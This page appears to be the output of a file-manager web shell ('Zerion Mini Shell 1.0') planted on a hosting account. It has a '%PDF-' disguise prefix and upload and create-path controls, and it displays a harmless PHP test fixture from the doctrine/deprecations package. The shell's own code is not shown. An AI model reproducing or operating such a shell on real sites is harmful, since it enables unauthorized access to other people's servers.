%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/graphicd/public_html/vebto/vendor/doctrine/deprecations/test_fixtures/src/
Upload File :
Create Path :
Current File : /home/graphicd/public_html/vebto/vendor/doctrine/deprecations/test_fixtures/src/Foo.php

<?php

declare(strict_types=1);

namespace DeprecationTests;

use Doctrine\Foo\Bar;

class Foo
{
    public static function triggerDependencyWithDeprecation(): void
    {
        $bar = new Bar();
        $bar->oldFunc();
    }

    public static function triggerDependencyWithDeprecationFromInside(): void
    {
        $bar = new Bar();
        $bar->newFunc();
    }
}

Zerion Mini Shell 1.0